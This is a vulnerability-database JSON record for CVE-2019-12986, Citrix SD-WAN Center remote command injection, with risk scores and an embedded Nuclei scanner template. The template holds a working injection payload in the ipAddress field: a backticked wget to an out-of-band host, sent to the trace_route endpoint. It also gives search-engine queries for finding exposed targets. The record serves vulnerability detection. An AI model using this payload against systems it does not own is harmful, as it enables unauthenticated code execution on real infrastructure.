{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2019-12986/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2019-12986/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2019-12986/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2019-12986/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2019-12986/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2019-12986"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2019-12986"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.39544,
      "kev": false,
      "percentile": 0.98549
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2019/CVE-2019-12986.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2019-12986\n\ninfo:\n  name: Citrix SD-WAN Center - Remote Command Injection\n  author: gy741\n  severity: critical\n  description: |\n    Citrix SD-WAN Center is susceptible to remote command injection via the trace_route function in DiagnosticsController, which does not sufficiently validate or sanitize HTTP request parameter values used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for ipAddress, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations.\n  impact: |\n    Successful exploitation of this vulnerability can lead to unauthorized access, data exfiltration, and potential compromise of the entire SD-WAN infrastructure.\n  remediation: |\n    Apply the necessary patches or updates provided by Citrix to mitigate the vulnerability.\n  reference:\n    - https://www.tenable.com/security/research/tra-2019-31\n    - https://support.citrix.com/article/CTX251987\n    - https://nvd.nist.gov/vuln/detail/CVE-2019-12986\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2019-12986\n    cwe-id: CWE-78\n    epss-score: 0.39544\n    epss-percentile: 0.98549\n    cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 2\n    vendor: citrix\n    product: netscaler_sd-wan\n    shodan-query:\n      - http.title:\"Citrix SD-WAN\"\n      - http.title:\"citrix sd-wan\"\n    fofa-query: title=\"citrix sd-wan\"\n    google-query: intitle:\"citrix sd-wan\"\n  tags: cve2019,cve,unauth,oast,tenable,citrix,rce,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /login HTTP/1.1\n        Host: {{Hostname}}\n      - |\n        POST /Collector/diagnostics/trace_route HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        ipAddress=%60/bin/wget+http://{{interactsh-url}}%60\n\n    matchers-condition: and\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body_1, \"<title>Citrix SD-WAN</title>\")'\n\n      - type: word\n        part: interactsh_protocol # Confirms the HTTP Interaction\n        words:\n          - \"http\"\n# digest: 4a0a00473045022100e4ad8beffb341e8cd4b997ea62046b7bc8f02072a4c8dde0ff751af99e5e08b8022061bdf84515b5da7f0e28f283db716db8484bc5ed8c54fd3016d9dd246f6a6495:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2019-12986"
}